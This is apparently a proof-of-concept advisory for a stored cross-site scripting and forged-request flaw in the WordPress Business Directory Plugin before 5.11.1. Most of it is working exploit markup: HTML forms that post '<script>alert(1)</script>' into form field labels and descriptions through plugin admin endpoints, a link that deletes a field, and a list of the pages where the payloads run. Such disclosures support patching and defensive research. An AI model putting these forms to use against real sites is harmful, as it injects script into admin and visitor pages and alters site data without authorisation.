Business Directory Plugin < 5.11.1 - Arbitrary Add/Edit/Delete Form Field to Stored XSS

<!-- Change Form Field XSS -->
<form action="https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=editfield&id=1" method="post">
<input type="hidden" name="field[id]" value="1">
<input type="hidden" name="field[tag]" value="title"> <input type="hidden" name="field[weight]" value="9">
<label> Field Label </label>
<input name="field[label]" type="text" aria-required="true" value="<script>alert(1)</script>">
<label> Field description <span class="description">(optional)</span></label>
<input name="field[description]" type="text" value="<script>alert(1)</script>">
<input type="submit" name="submit" id="submit" class="button button-primary" value="Update Field">
</form>

<!-- Add Form Field XSS -->
<form action="https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=editfield&id=1" method="post">
<label> Field Label </label>
<input name="field[label]" type="text" aria-required="true" value="<script>alert(1)</script>"> 
<label> Field description <span class="description">(optional)</span></label>
<input name="field[description]" type="text" value="<script>alert(1)</script>">
<input type="submit" name="submit" id="submit" class="button button-primary" value="Update Field"> 
</form>

XSS payloads execute:
- On the business directory page when adding a listing: /business-directory/?wpbdp_view=submit_listing
- On the Import/Export page: /wp-admin/admin.php?page=wpbdp_admin_csv
- When adding/editing a listing /wp-admin/post-new.php?post_type=wpbdp_listing
- On various Settings page, such as /wp-admin/admin.php?page=wpbdp_settings&tab=listings&subtab=listings%2Fsorting, /wp-admin/admin.php?page=wpbdp_settings&tab=listings&subtab=search_settings

<!-- Delete Form Field-->
<a href="https://example.com/wp-admin/admin.php?page=wpbdp_admin_formfields&action=deletefield&id=1">Delete</a>